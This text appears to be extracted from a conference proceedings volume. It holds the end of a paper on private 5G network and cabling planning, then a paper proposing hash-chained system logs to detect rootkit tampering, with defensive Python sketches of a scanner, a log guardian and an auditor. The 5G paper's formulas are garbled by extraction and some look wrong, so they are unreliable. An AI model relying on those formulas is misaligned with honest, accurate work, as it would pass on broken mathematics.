The summation method consists in calculating the length of each horizontal cable run, followed by the addition of the obtained values. A technological margin, as well as a margin for termination at the junction points (JPs) and on the patch panels, is added to the result. The statistical method is, in essence, a practical realization of the central limit theorem of probability theory. The idea of this method is to use an estimate of the length of a typical run to calculate the total horizontal cable length for a concrete cable system, namely for the part of it served by a single telecommunication closet. Concretely, the evaluation process is based on statistical regularities that are invariably observed in any structured cabling installation. The reliability of calculations by the statistical method is additionally supported by the fact that, according to the ISO/IEC 11801 standard, a horizontal subsystem cable cannot be longer than 90 m (for Ethernet technology). The essence of the method is as follows: the length of each j-th track can be represented as L_j = ν_j + ξ_j, where ν_j is the cable length laid along the vertical sections and ξ_j is a random value with some law of distribution over the working zone area xOy served by the commutation equipment installed in the given technical facility. Supposing that:

• the gNb base stations are equipped with JPs of the same type and distributed evenly over the served territory xOy;
• the location of the technical facilities is optimal;
• the cable tracks of most horizontal cables are designed according to the same rule, so that it can be adopted with sufficient practical certainty that ν_j = const,

then, when these conditions are fulfilled, the probability density of the run length distribution is symmetrical (has zero asymmetry). With a symmetrical distribution, the estimate of the average cable track length can be found as half the sum of the lengths of the longest and shortest cable tracks. On the basis of these assumptions, the average cable length L_av expended on one run can be taken as

L_av = ((L_max + L_min) / 2) · K_s + X,
218
R. Odarchenko et al.
taking into account the features of the cable laying, all of the descents, ascents, turns, inter-floors (in presence of such), etc.; Ks – technological reserve coefficient, equals 1.1 (10%); X – margin for the cable processing accomplishment. Furthermore, general quantity of layings N cr , for that one coil of cable is enough can be calculated: Ncr =
Lcb , Lav
where L cb is the cable coil length. As the last step, the whole quantity of the L c cable needed for the cable system creation could be received: Lc = Lcb ×
Nto , Lcr
where N to is the quantity of JPs at the constructed SCS. The result of dividing at the formula ordinarily is non-integer value, so the round off to the integer number procedure takes place. Area of the Statistical Method Application. Cable track lengths, (according to the previously accepted assumptions, equivalent to the lengths of selected SCS horizontal subsystem layings), can be estimated as independent random values. According to the probability theory, the arithmetic average dispersion of paired random values is n times smaller than σ2 of each value, in other words, it can be written at specifications that: D(lav ) =
σ2 . n
The n-quantity of selected layings, during which the root-mean-square deviation of the lengths average value from the mathematical expectation would not surpass preintended value, for reliability, for example – 5%, can be found based on the following correlation: σ/lav ≤ 0.05. With σ/lav = 0.42 (an assumption based on the practical result), assume, that n would be equal not less than 84, i.e. it is advisable to use the statistical method to calculate the cable system or its parts that are providing service to N = 42 or more commutative devices [19]. One of the conditions for using the statistical method was an assumption that the distribution function is symmetrical. Data processing of practically accomplished projects shows that asymmetry average value equals approximately 0.44, or the difference between a distributed function and a symmetric one, in fact, cannot be counted negligibly small. Consider that this difference influences on the level of reliability of the calculations. For it, according to the method of moments, the actually obtained distribution function is approximated by the Gram-Charlier row [18] that represents normal a distribution
Optimal Structure Construction of Private 5G Network
219
with correction. To simplify further calculations, during the row construction only two first members are retained in it: γ3 3 1 x2
x − 3x + . . . , (20) ϕ(x) = √ e 2 1 + 3l 2π where γ3 is an asymmetry index; x = t−Mt σ is standardized random value. The probability that horizontal cable length would not be greater than x, would be: x2 γ3
u (x) = (x) + √ (21) 1 − x2 e 2 , 3l 2π where Φ u (x) is an approximated distribution function, F(x) is a normal distribution function. Selection of the Location of Technical Premises for Telecommunications Closet Floor. Due to the large number of JPs, that are installed in the process of the SCS horizontal wiring, the problem of optimal design of bottom level of the cable system according to different criteria allows to reduce the cost of creating the cable wiring, as well as the time of the whole project accomplishment dramatically. Location coordinates of the telecommunication closet facility that provide JPs services in the concrete working zone and optimal by the selected laying of the minimal average length criterion coincide with the plate mass center that is situated on the xOy plane. At the same time, the plate form suits to the maintained work zone topology and its density ρ (x, y) is equivalent to the workplace placement density. Technical facility location coordinates can be calculated according to the following formulas: ¨ ¨ 1 1 ρxdxdy; y0 = ρxdxdy; (22) x0 = M M ˜ where M= ρdxdy is general quantity of gNb based stations that are maintained by certain telecommunication closet. In this case, if the serviced working area depicted in Fig. 2 is presented as a rectangle with sides (a;b) (c;d) and some selected JPs are distributed in the figure equally, then ρ(x,y) = ρ = const, telecommunication closet facility location coordinates that are optimal by linear horizontal cable minimal summarized length would be equal to: b−a d −c ; y0 = . 2 2 Formerly it has been shown that in such case an average length of cable laying would be close to x0 =
(b − a) + (d − c) . 4 During the arrangement of telecommunication closet facility position on the edge of service zone, for example on the F point (Fig. 2), the evaluation of average length of cable laying made by the same principles, would be equal to
l =
l =
(b − a) + (d − c) . 2
220
R. Odarchenko et al.
Fig. 2. Illustration for determining the location of telecommunication closet
So, due to the optimization of the place of technological facility position, the economy of cable, which expends for each average statistical laying accomplishment, can achieve: l = 100 = 50%. l On the basis of fore quoted theoretical base, telecommunication closet technical facility (Fig. 3) optimizing schematic planning has been accomplished for effective information-communication network based on 5G technologies planning. Following the represented scheme, calculations of the telecommunication closet technical facility location and cable quantity, spent on the subsystem accomplishment can be done.
Fig. 3. Schematic representation of the projected network
Optimal Structure Construction of Private 5G Network
221
6 Results Thus, as a result of the research, the method of private cellular 5G networks planning has been improved. The generalized model of the method is shown in the Fig. 4 below.
Fig. 4. Schematic representation of the method of private cellular 5G network planning
The main steps of the method are as follows: Stage 1. Selection of optimal design solutions for private networks. At this stage, an assessment of the optimality of a group of solutions that can be applied to design and deploy a private 5G network for an enterprise is made. Stage 2. Radio access network planning. This stage consists in assessing the maximum allowable attenuation of radio signals along the radio wave propagation path for specific conditions, taking into account the imposed restrictions on the quality of service for subscribers of a private network, as well as its cost. As a result of this stage, the design of the substructure of base stations with the approximate coordinates of their location takes place. Stage 3. Backhaul planning. At this stage, for the designed radio network, the cabling structure is planned, which will be used to connect the base stations and switching centers. It also calculates the optimal amount of cable (fiber) that is required for the effective functioning of the network.
7 Discussion Automation of production processes is very important nowadays. In order to minimize costs and at the same time increase the efficiency of production processes, a 5G private network planning method has been developed, which is obviously the most suitable for solving the voiced tasks, for the needs of the enterprise. This method is very timely and potentially useful. Unlike other existing methods [7–10], this method takes into account much more input characteristics and functions of production enterprises. Thus, planning accuracy can be improved for a value of up to 7–10%. In addition, for a comprehensive solution of the planning problem, the stage of accurate planning of the cable subsystem is also introduced with the determination of the optimal location of the switching junction stations. In further studies, it is planned to design a 5G test network and verify the developed method.
222
R. Odarchenko et al.
8 Conclusions The research carried out in this work makes it possible to develop methods for improving the network architecture of enterprises in order to further optimize production processes. Thus, the 5G planning method for enterprise production processes, consisting of a radio network covering consecutive ensuring for each basic station location definition using radio signal path loss evaluation optimized model including minimal carrying capacity limit, connection quantity limit and its dependability and communication transition segment construction including the definition of telecommunication closet facility optimal location is developed in this paper. The developed method provides the possibility to plan the optimal structure of 5G cellular network for production processes optimization, to evaluate and reduce total expands for the network construction, guaranteeing necessary network nodes service quality and reliability indexes at the same time. Acknowledgement. This work was supported in part by the European Commission under the 5G-TOURS: SmarT mObility, media and e-health for toURists and citizenS (H2020-ICT-2018– 2020 call, grant number 856950). Opinions, expressed in this paper are those of the authors and do not necessarily represent the whole project.
References 1. Gartner: Gartner Identifies the Top 10 Wireless Technology Trends for 2019 and Beyond (2022). https://www.gartner.com/en/newsroom/press-releases/2019-07-23-gartneridentifies-the-top-10-wireless-technology-tre 2. Prokopenko, I., Omelchuk, I., Chyrka, Y.: RADAR signal parameters estimation in the MTD tasks. Int. J. Electron. Telecommun. 58(2), 159–164 (2012) 3. Habiba, U., Hossain, E.: Auction mechanisms for virtualization in 5G cellular networks: basics, trends, and open challenges. IEEE Commun. Surv. Tutor. 20(3), 2264–2293 (2018) 4. Cho, H.-H., Lai, C.-F., Shih, T., Chao, H.-C.: Integration of SDR and SDN for 5G. IEEE Access 2, 1196–1204 (2014) 5. Mi, D., et al.: Demonstrating immersive media delivery on 5G broadcast and multicast testing networks. IEEE Trans. Broadcast. 66(2), 555–570 (2020) 6. Tran, T., et al.: Enabling multicast and broadcast in the 5G core for converged fixed and mobile networks. IEEE Trans. Broadcast. 66(2), 428–439 (2020) 7. Haile, B., Mutafungwa, E., Hamalainen, J.: A data-driven multiobjective optimization framework for hyperdense 5G network planning. IEEE Access 8, 169423–169443 (2020) 8. González, D., Mutafungwa, E., Haile, B., Hämäläinen, J., Poveda, H.: A planning and optimization framework for ultra dense cellular deployments. Mob. Inf. Syst. 1–17 (2017) 9. Chiaraviglio, L., Di Paolo, C., Blefari Melazzi, N.: 5G network planning under service and EMF constraints: Formulation and solutions. IEEE Trans. Mob. Comput. 21, 3053–3070 (2021) 10. Tseng, F., Chou, L., Chao, H., Wang, J.: Ultra-dense small cell planning using cognitive radio network toward 5G. IEEE Wirel. Commun. 22(6), 76–83 (2015) 11. Mishra, A.: Fundamentals of Network Planning and Optimisation 2G/3G/4G. John Wiley & Sons Inc, Hoboken (2018)
12. Umar Khan, M., Azizi, M., Garcia-Armada, A., Escudero-Garzas, J.: Unsupervised clustering for 5G network planning assisted by real data. IEEE Access 10, 39269–39281 (2022)
13. Oughton, E., Katsaros, K., Entezami, F., Kaleshi, D., Crowcroft, J.: An open-source techno-economic assessment framework for 5G deployment. IEEE Access 7, 155930–155940 (2019)
14. Stefanoiu, D., Borne, P., Popescu, D., Filip, F.G., El Kamel, A.: Optimization in Engineering Sciences: Approximate and Metaheuristic Methods: Metaheuristics Stochastic Methods and Decision Support. John Wiley & Sons Inc, Hoboken (2014)
15. Bezruk, V.M., Bukhanko, A.N., Chebotaryova, D., Varich, V.V.: Multicriteria optimization in telecommunication networks planning, designing and controlling. In: Open Book “Telecommunications Networks”, pp. 251–274 (2012)
16. Odarchenko, R., Dyka, N., Poligenko, O., Kharlai, L., Abakumova, A.: Mobile operators base station subsystem optimization method. In: 2017 IEEE 4th International Scientific-Practical Conference Problems of Infocommunications. Science and Technology (PIC S&T), pp. 29–33 (2017)
17. Sun, S., et al.: Propagation path loss models for 5G urban micro- and macro-cellular scenarios. In: 2016 IEEE 83rd Vehicular Technology Conference (VTC Spring), pp. 1–6 (2016)
18. Zhang, P., Lee, S.: Probabilistic load flow computation using the method of combined cumulants and Gram-Charlier expansion. IEEE Trans. Power Syst. 19(1), 676–682 (2004)
19. Semenov, A.: Design and Calculation of Structured Cabling Systems and Components. DMK Press, p. 418 (2018)
Linked List Systems for System Logs Protection from Cyberattacks

Victor Boyko1, Mykola Vasilenko1, and Valeria Slatvinska2(B)

1 National University “Odessa Law Academy”, Odesa, Ukraine
[email protected] 2 International Humanitarian University, Odesa, Ukraine
[email protected]
Abstract. A new solution to an important cybersecurity problem is proposed, namely the protection of system logs using blockchains. System logs are one of the main sources for detecting intrusions and the presence of hidden malware in a system, yet in modern mid-level systems the protection of logs from tampering is not adequately addressed. This becomes especially relevant in view of the emergence of a new generation of malware (Kobalos). We suggest a blockchain-based system as an efficient and computationally undemanding tool for protecting system logs. Unlike traditional protection methods, the blockchain-based system proposed in the article does not require the deployment of additional infrastructure and can be used within the existing architecture for collecting information about the operating system.

Keywords: Rootkits · malware detection · cyberattack · blockchain · log · SIEM
1 Introduction

In a broad sense, the web server is the basis and key component of a modern computer network: it includes not only the server software itself (the LAMP/LAPP stack) but also the entire accompanying infrastructure, and it is a cornerstone of the modern World Wide Web. Various server implementations for home networks, as well as servers providing a web interface to various applications, have also become widespread (in particular, in Linux a web interface is used to configure the Common UNIX Printing System). This ubiquity has made web servers the most obvious target for cyberattacks [1, 2]. Thus, the number of botnets, infected computers and attacks grows every year, while the software, techniques, tactics and strategies of the attacking side are constantly being improved. Rootkits are one of the most dangerous types of malware: software aimed at covert introduction into a system (in this case, a web server) and obtaining administrator rights in it (privilege escalation). A rootkit tends to remain stealthy, but it usually needs to communicate with the outside world [3]. A detailed overview of the classification of rootkits and similar software by stealth classes and target tasks is given in [4].
Without a well-developed security infrastructure, such systems are easily contaminated with malware, while the established countermeasures based on binary file analysis or system behavior analysis require resources, knowledge, and a common security culture. This, in turn, increases interest in protection based on the analysis of system logs. Experimental log-analysis systems using artificial intelligence are currently being developed; in addition, a new standard for system event logs has been established and is being implemented. Soon the protection infrastructure will include automated analysis of system logs and will become widespread. At the same time, the improvement of such protection will inevitably provoke countermeasures by the attacking side: malware will emerge that, after privilege escalation, modifies system logs to avoid detection. Cybercriminals have already begun to build tools for masking the presence of malware into their software [5], inter alia by modifying logs, which complements other masking techniques (timestomping, process masking, etc.) well. Even the most primitive attack, such as simple deletion of logs, reduces the visibility of malware in the system, makes it harder to detect and diagnose, and allows rootkits to function undetected for a long time, which in turn increases the scale of the infection. At the same time, work with logs and system event logs is still in its initial state; as noted, an attack by deleting logs succeeds only in the absence of a proper infrastructure for working with logs and event logs and with low literacy of the system administrator. In the presence of the basic means of protection listed above, deleted logs will be restored from a backup, and the very absence of records in the system log will indicate an external intrusion and serve as a reason to take all necessary measures to protect the system. Thus, increased attention must be paid to the preservation and analysis of system logs and to organizing at least a minimal log security system. The aim of this work is to find an acceptable solution for protecting system logs in mid-level systems, first of all with regard to the cybersecurity of logs in the context of new-generation malware. Unlike traditional protection methods, the proposed solution does not require significant system resources and can be recommended for implementation in the most vulnerable mid-range systems. Protecting logs with a blockchain complicates the modification of logs “backdating”: an attacker has to find suitable hashes and modify the logs, while a rootkit usually has very limited resources. This (a) reveals the very fact of intrusion into the system and (b) leads to bloating of the malware and the use of larger resources, which again enlarges its footprint and facilitates detection. The novelty of the results lies in the fact that a system for verifying logs using a blockchain is proposed for the first time. At low deployment costs, such a system makes it possible to detect unauthorized modification of logs, which greatly facilitates the work of a system administrator and improves the security of a web server.
2 Materials and Methods

To understand the problem of protecting system logs from cyberattacks, the following well-known points should be considered. There are three main tools for detecting and searching for rootkits: binary file analysis, system and user behavior analysis, and system log analysis [6, 7]. Classical analysis of binary files includes scanning for the signatures of known malware and heuristic analysis. Both approaches, for all their practical value, have the following disadvantages. Signature analysis is simple and intuitive, does not require a large amount of computing resources, and makes it possible to identify a specific attack and the malware used for it with high accuracy and a relatively low level of false positives [8]. Nonetheless, collecting signatures and defining decision rules turns out to be an extremely time-consuming task in the long run, since modern databases contain an enormous number of signatures; for example, the Comodo antivirus database contains more than 86,359,675 signatures (almost one hundred million). Heuristic analysis is, in a sense, the opposite of signature-based search. Heuristics can detect new and freshly written specimens, and the rule base is less cumbersome than a signature database, so checks can, in theory, run faster and with fewer resources. However, heuristic analyzers usually have a high false positive rate, and heuristic rules are easily circumvented if they are known to the malware developer in advance. It is common practice for such developers to embed special techniques in attack software that allow it to evade heuristic analysis, for example, code fragments that break or disable a debugger that tries to trace program execution [9]. Typically, existing antivirus software uses a combined approach based on both techniques. However, there are certain limits to the effectiveness of these approaches, determined mainly by the available computing power of the hardware. The second type of malware detection focuses on indirect analysis of what is happening in the system. Such analysis may include analysis of network activity (the content and nature of outgoing and incoming traffic), of application activity, and of user activity. For example, the simplest analysis of this type inspects the state of the system ports, since some malware listens on free ports to communicate with the outside world [10, 11]. This type of analysis can be quite effective; however, the widespread use of peer-to-peer and cryptographic communication technologies complicates it, since it becomes increasingly difficult to analyze traffic that is not just encrypted but homogeneous (for example, when Tor or i2p is used, it is difficult to separate the native traffic of the system from the transit data flow passing through it, since the system gives part of its resources to the overall network) [12]. Thus, protecting the system from intrusions remains an important and urgent problem in the sphere of cybersecurity.
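As a minimal sketch of the signature-based approach just described, the following fragment scans a binary for known byte patterns; the signature values, names and file path are purely hypothetical and do not come from any real antivirus database.

```python
from pathlib import Path

# Hypothetical byte signatures of known malware samples (illustrative only).
SIGNATURES = {
    "demo-rootkit-a": bytes.fromhex("deadbeef4b4f42"),
    "demo-rootkit-b": b"\x7fELF\x02\x01\x01evil",
}

def scan_file(path: str) -> list[str]:
    """Return the names of all signatures found in the file's raw bytes."""
    data = Path(path).read_bytes()
    return [name for name, sig in SIGNATURES.items() if sig in data]

if __name__ == "__main__":
    hits = scan_file("/usr/local/bin/suspect")  # hypothetical path
    print("matches:", hits or "none")
```

Real scanners add decision rules on top of raw substring matching, which is exactly what makes maintaining such databases so labor-intensive.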
At the same time, most of a server's security is currently determined by preventive measures (hardening) and competent system configuration: installing a firewall, using strong passwords and public key authentication, correctly distributing the roles and rights of system users, changing default settings, etc.
Under these conditions, one of the main tools for both primary and secondary intrusion diagnostics is event logs of software and system logs (operating system logs). These are sets of diagnostic messages generated by regularly or irregularly functioning software, and they can be effectively used to detect the fact of an intrusion and to take further action. That is why, alongside the analysis of files and of activity, we place them in the third category of protection tools. Logs are often the only material available for investigating incidents; their analysis can be carried out both manually and automatically, by selecting signatures and heuristic rules that are applied not to binary files but to the messages in the logs [13]. Considering the cost of direct and indirect analysis of file content and system behavior, the analysis of event records remains one of the last and most radical means, the last resort for identifying hidden malware. For a while, protection based on analyzing system logs was not a priority in the development of security systems, especially among developers and mid-level administrators who lack the resources and knowledge to organize a developed security infrastructure. The lack of common standards, tactics, and policies for the protection of system logs was an additional obstacle, and this was typical for both the attacking and the defending side. Logs are valuable material for analyzing the nature of attacks and the behavior of the attacking side, and for providing information in the case of a breach of the defense [14]. Working with logs and system logs is an important component of system security; therefore, if an integrated security system is deployed, it must include SIEM (Security Information and Event Management), which historically combined SIM (Security Information Management), a system for managing security information, and SEM (Security Event Management), a system for managing security events [15, 16]. SIEM provides real-time analysis of security events (triggers) emanating from various devices and applications and makes it possible to respond to possible threats proactively. Modern off-the-shelf SIEMs can have rather complex and branched architectures and include many different sources of information. However, while the use of SIEM is widespread among large corporations, mid-level web servers are characterized, firstly, by the absence of any integrated security system and, secondly, by neglect of collecting, protecting and processing logs.
3 Experiments

The whole process of the system is divided into three parts.

Provisioning Mode. At this stage, the tracking system is initialized. As mentioned above, a separately stored secret key $K$ is used at system startup; such a key can be a password that the user invents. Based on the key, the hash $h_0 = h(K)$ is calculated, where $h(\cdot)$ is a hash function that produces a digest of a block of information. After the system is initialized and has run its initial sequence, the guardian is launched. It allocates a block of information $B_0$, which includes the value $h_0$ and all entries $(J_1, J_2, \ldots, J_n)$ written to the system log after the system started. The guardian then calculates the value $h_1$ according to the following formulas:

$$B_0 = \{h_0;\ J_1, J_2, \ldots, J_n\},$$
$$h_1 = h(B_0),$$

where $h_0 = h(K)$ is the hash of the user's key $K$; $J_1, J_2, \ldots, J_n$ are the first $n$ entries in the system log, from system start to the time the guardian was started; $B_0$ is the initial block of data; and $h_1$ is the hash sum of the initial block of data. The value $h_0$ is stored separately during the initial start of the guardian, without being added to the log; the guardian securely erases it from the system immediately after calculating the hash of the first block of data. This ensures the stability of the system against a “chain attack”, in which an attacker tries to consistently falsify all digital signatures in the log, starting with the one he needs and ending with the “zero block”. Since the zero block is not stored in the system and is derived from the user's key, the block chain is tied to a key that is inaccessible to the attacker. After $h_0$ is erased, the system is considered closed and returns to normal operation; within the terminology of the log protection system, this mode is referred to as the “control mode”.

Control Mode. At this stage, the system operates in its normal mode, while saving key information to ensure the integrity of the logs. The guardian is launched at regular intervals. In the simplest case, for a web server running GNU/Linux, such a program (or script) can be started using the cron service or a corresponding systemd unit. It is also possible to trigger the start after an equal number of messages in the system log, the number of such messages having been specified in advance; one implementation of such an algorithm is similar to the way the logrotate system utility works, although logrotate operates over large intervals. The choice of the interval should be based on the ratio between system resources and the size of the security window: running the guardian more frequently leaves a smaller window of opportunity for attacking malware but requires more system resources. The server's software and hardware characteristics and its request load also influence this choice; most of these parameters are selected empirically and quite simply in practice. The start of the guardian should be adjusted so that it runs after fairly short time intervals $t$, or after some small number of messages $N$. After starting, the guardian takes a block of information from the system log, similar to how it was done at the provisioning stage. Such a block includes the hash sum $h_{n-1}$ of the previous data block $B_{n-1}$ (which is stored in the same log as the rest of the messages) and a sequence of messages $J_1^n, J_2^n, \ldots, J_n^n$ generated by system services during the regular operation of the system. Let us denote such a block as $B_n$:

$$B_n = \{h_{n-1};\ J_1^n, J_2^n, \ldots, J_n^n\}.$$

The guardian calculates the hash sum $h_n$ of these records according to the following formula:

$$h_n = h(B_n),$$

where $B_n$ is data block $n$ and $h_n$ is the hash sum of data block $n$. The guardian enters the value $h_n$ into the system log as a normal system message. Thus, the selected block of messages receives a digital signature, which includes the signature of the previous block.
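A minimal sketch of the provisioning and signing steps, assuming SHA-256 as the hash function and a plain text log file; the log path and the GUARD_TAG marker are illustrative assumptions, and the authors' own prototype (mentioned later, also in Python) may differ in detail:

```python
import hashlib

LOG_PATH = "/var/log/guarded.log"   # hypothetical log file used in this sketch
GUARD_TAG = "GUARDIAN-HASH:"        # marker distinguishing the guardian's records

def provision(log_path: str, user_key: str) -> str:
    """Provisioning mode: seed the chain with h_0 = h(K). h_0 itself is
    never written to the log; only h_1 = h(B_0) is appended."""
    h0 = hashlib.sha256(user_key.encode("utf-8")).hexdigest()
    with open(log_path, "r", encoding="utf-8") as f:
        entries = f.read().splitlines()
    b0 = h0 + "\n" + "\n".join(entries)          # B_0 = {h_0; J_1 ... J_n}
    h1 = hashlib.sha256(b0.encode("utf-8")).hexdigest()
    with open(log_path, "a", encoding="utf-8") as f:
        f.write(f"{GUARD_TAG} {h1}\n")
    return h1

def sign_new_block(log_path: str) -> str:
    """Control mode: hash the previous signature line together with all
    messages written after it, and append the result as a normal message."""
    with open(log_path, "r", encoding="utf-8") as f:
        lines = f.read().splitlines()
    last_sig = max(i for i, ln in enumerate(lines) if ln.startswith(GUARD_TAG))
    block = "\n".join(lines[last_sig:])          # B_n = {h_{n-1}; J_1^n ... J_n^n}
    h_n = hashlib.sha256(block.encode("utf-8")).hexdigest()
    with open(log_path, "a", encoding="utf-8") as f:
        f.write(f"{GUARD_TAG} {h_n}\n")
    return h_n
```

In practice, sign_new_block would be invoked by cron or a systemd timer at the interval $t$ discussed above.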
Signing each block in this way adds a certain amount of redundant information to the system log, turning it into a sequence of connected records, a blockchain that is closed with a key not present in the system. The last link in the chain is held outside the system in the form of the separately stored user secret password key $K$.

Audit Mode. A reverse audit of the logs is performed at a given frequency, or upon suspicion of an intrusion: the system logs are checked for integrity. To do this, the log auditor is launched; it sequentially checks the integrity of each block of the system log in reverse order, starting with the last block and ending with the first one, which rests on the hash value $h_0 = h(K)$, where $K$ is the separately stored user secret password. In audit mode, the following procedure is suggested. When the auditor starts, the system log contains the following sequence:

$$J_1, J_2, \ldots, J_n,\ h_1,\ \ldots,\ h_{n-2},\ J_1^{n-1}, J_2^{n-1}, \ldots, J_n^{n-1},\ h_{n-1},\ J_1^n, J_2^n, \ldots, J_n^n,\ h_n,$$

where $J_1$ is the very first message in the log; $J_i$ is the log message with number $i$; $J_n$ is the most recent message in the log; $J_1^n, J_2^n, \ldots, J_n^n$ are the $n$ records of the system data block between records $h_{n-1}$ and $h_n$; and $h_j$ is the hash sum of data block $B_j$, which includes the hash sum $h_{j-1}$. In most cases, the system log will also have an unsigned “tail” $J_1^t, \ldots, J_m^t$ and will look as follows:

$$J_1, J_2, \ldots, J_n,\ h_1,\ \ldots,\ h_{n-2},\ J_1^{n-1}, \ldots, J_n^{n-1},\ h_{n-1},\ J_1^n, \ldots, J_n^n,\ h_n,\ J_1^t, \ldots, J_m^t.$$

The “tail” represents a window of opportunity for attacking the defense system; however, given the fairly short launch intervals $t$ of the guardian discussed above, such a “tail” can be neglected in practice. The auditor selects blocks of information starting from the last one, $B_n$, which spans the records $h_{n-1}, J_1^n, J_2^n, \ldots, J_n^n, h_n$. The auditor computes the checksum $h_n^c$ for the block $B_n$:

$$B_n = \{h_{n-1};\ J_1^n, J_2^n, \ldots, J_n^n\}, \qquad h_n^c = h(B_n),$$

where $B_n$ is the verification data block newly formed for the audit, and $h_n^c$ is the hash sum of that check block. The control value $h_n^c$ is then compared with the value $h_n$ taken from the system log. If the sums match, the next block is checked, and the procedure is repeated for the block $B_{n-1}$:

$$B_{n-1} = \{h_{n-2};\ J_1^{n-1}, J_2^{n-1}, \ldots, J_n^{n-1}\},$$

for which the control value $h_{n-1}^c$ is calculated and compared with the system value $h_{n-1}$ obtained from the log.
If all values from the system log match the control values, the checks continue until block $B_0$ is reached, spanning the records $J_1, J_2, \ldots, J_n, h_1$. To check this last block, the auditor needs the value $h_0$, which has been removed from the system. Therefore, to complete the verification procedure, the user is asked for the password $K$ that was used to calculate $h_0$. The check block $B_0^c$ is then formed:

$$B_0^c = \{h_0;\ J_1, J_2, \ldots, J_n\},$$

after which the checksum value $h_1^c$ is calculated:

$$h_1^c = h(B_0^c),$$

and compared with the value $h_1$ from the system log. If the sums match, the audit is considered complete and the integrity of the system log is confirmed. If the control and system hashes do not match at any of the checks, a violation of system integrity is declared and the number of the block in which the integrity was violated is reported. Such a system makes it possible not only to detect the fact that logs were modified, but also to localize the modification within the overall system log, and therefore to significantly narrow the time interval (and, in some cases, to shorten the list of services that may have been compromised), which simplifies the forensic investigation of the incident.
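A complementary sketch of the audit pass, under the same assumptions as the guardian sketch above (SHA-256, plain text log, hypothetical GUARD_TAG marker); the unsigned tail after the last signature is ignored, as the article suggests, and the returned block index localizes any tampering:

```python
import hashlib

GUARD_TAG = "GUARDIAN-HASH:"  # same illustrative marker as in the guardian sketch

def audit_log(log_path: str, user_key: str) -> int:
    """Audit mode: verify the hash chain in reverse order. Returns -1 if the
    log is intact, otherwise the index of the first corrupted block found."""
    with open(log_path, "r", encoding="utf-8") as f:
        lines = f.read().splitlines()
    sig_positions = [i for i, ln in enumerate(lines) if ln.startswith(GUARD_TAG)]
    for blk in range(len(sig_positions) - 1, -1, -1):
        end = sig_positions[blk]                 # line holding h_{blk+1}
        if blk == 0:
            # Block B_0 is seeded with h_0 = h(K), which is not in the log,
            # so the user's key is requested for the final check.
            h0 = hashlib.sha256(user_key.encode("utf-8")).hexdigest()
            block = h0 + "\n" + "\n".join(lines[:end])
        else:
            start = sig_positions[blk - 1]
            block = "\n".join(lines[start:end])  # includes the h_{blk} line
        expected = lines[end].split(None, 1)[1]
        if hashlib.sha256(block.encode("utf-8")).hexdigest() != expected:
            return blk                           # localizes the tampered block
    return -1
```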
4 Results

Administrators, especially of mid-level security systems, rarely organize backup, processing and analysis of logs; the situation is better in large corporate systems. Even where a backup is implemented, it is rarely checked for integrity and consistency, which can be exploited to mask a system breach by replacing or distorting the logs that could reveal it. Web servers are the most common target for cyberattacks, partly because the personnel responsible for installing and configuring web systems are often insufficiently competent. This thesis is confirmed by the following statistics. In 2015, the average time to detect a successful cyberattack ranged from 50 to 70 days [17]. According to IBM reports for 2020, it takes up to 280 days merely to identify a leak, while estimates by other experts vary from hundreds of days to a year [18]. According to the Mandiant Security Effectiveness Report, 53% of successful cyberattacks infiltrated organizations without being detected, and 91% of all incidents did not generate an alert [19]. There are several reasons for such neglect:

• not everyone treats logs and system logs as an important component of system security (often protection is limited to installing a firewall and an antivirus);
• logs take up a large volume (the log of the not-especially-loaded server analyzed in this work grows to more than 400 MB in 8 days);
• working with logs requires expenditure on an external infrastructure; depending on the volume of logs, such an infrastructure can be very expensive and not efficient enough;
• there is no single standard or practice for working with logs. A standard for log messages (Sigma, the Generic Signature Format for SIEM Systems) [20] was proposed two years ago but has not yet received general acceptance; the format of the logs and their processing is often left to the discretion of the server operator and receives little attention.

The maximum protection typically carried out in this case is:

• backing up logs;
• analysis of logs by an automatic analyzer;
• analysis of logs with one's own rules.

This is clearly not enough, even in large corporations that use SIEM, especially considering the growing number of intrusions and the statistics on their detection. The problem is aggravated by the fact that there are many different implementations of web server software, whose configuration and security can differ greatly, which complicates training and the transition from one configuration to another. The functioning of a server is provided by a set (stack) of interacting programs: the web server itself, a database, a programming language and related frameworks, configuration and interaction systems, an operating system and its access protocols, each of which, if configured or operated incompetently, can represent a potential or real vulnerability. The complexity and variety of web server operation is associated with a large amount of raw information in which a person without technical means of analysis and processing can easily get lost: text logs of server visits for several days can reach sizes on the order of gigabytes, which makes viewing them with the naked eye meaningless. According to the MITRE classification [21], attacks related to the modification of logs (Indicator Removal on Host) belong to the metaclass with ID T1070. At the time of writing, 17 types of malicious software using technique T1070.001 (Clear Windows Event Logs) and 3 varieties using technique T1070.002 (Clear Linux or Mac System Logs) had been registered. Specifically, the database describes malware S0279 Proton, which removes logs from /var/logs and /Library/logs; G0106 Rocke, which clears log files within the /var/log/ folder; and G0139 TeamTNT, which removes system logs from /var/log/syslog. The most recent discovery at the time of writing is Kobalos, which, according to an ESET report [22], forges timestamps in system logs to hide its presence in the system. This is just the beginning: the emergence of more malware using similar hiding techniques is expected in the near future. Thus, there is already a need for a system for protecting and verifying web server logs that meets the following criteria: it should not require an expensive and complex infrastructure, should minimally increase the load on the operating system, should not
require changes to the existing architecture, and should not require complex implementation and deployment activities from the system administrator. The introduction of such a system would significantly reduce the possibility of malware spreading.
5 Discussion

The system proposed in this article operates in “parallel mode”, relying on the native logging system. Importantly, for all its modesty, such a protection system does not require large implementation costs, yet it greatly complicates an attacker's ability to hide the traces of an intrusion on the server. To hide the traces of an intrusion into the system, the attacker will either have to delete the system logs altogether, which is itself a signal of intrusion, or attack the security system, for example by trying to find suitable collisions for the hash function, carrying out a “chain attack”, or trying to exploit the unsigned “tail” of the system log. Even in the most optimistic scenario for the attacker, this greatly complicates and slows down his task, if it does not make hiding the traces impossible. Further complications of the algorithm are possible; however, in our opinion, the proposed process is simple and easy to implement. The controlling system turns out to be simple and undemanding of system resources: it uses the native system log as its base and does not require the cost and resources of organizing an additional system for backing up, storing and analyzing logs. The load on the server is small even when running a conceptual prototype implemented in the Python scripting language, and the resource savings could be even greater if the algorithm were implemented in C. The principal advantage of the proposed system is that it can be deployed without interfering with the internal operation of the system as a whole. It is irrelevant which log collection mechanism is used: the operation of the system is unaffected by whether the logs are stored in the traditional form (as text in /var/log/<web server name>) or the operating system uses the more advanced systemd and its associated systemd-journald. In all cases, it is sufficient for the security software to have two-way access to the logs, i.e., to be able to read them and to leave its own messages in the log, and this is easily implemented through existing interfaces.
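As an illustration of the two-way access just mentioned, a guardian process can emit its hash records through the standard syslog interface rather than appending to a file directly. This sketch uses Python's syslog module; the ident string and message format are illustrative assumptions, not an interface prescribed by the article.

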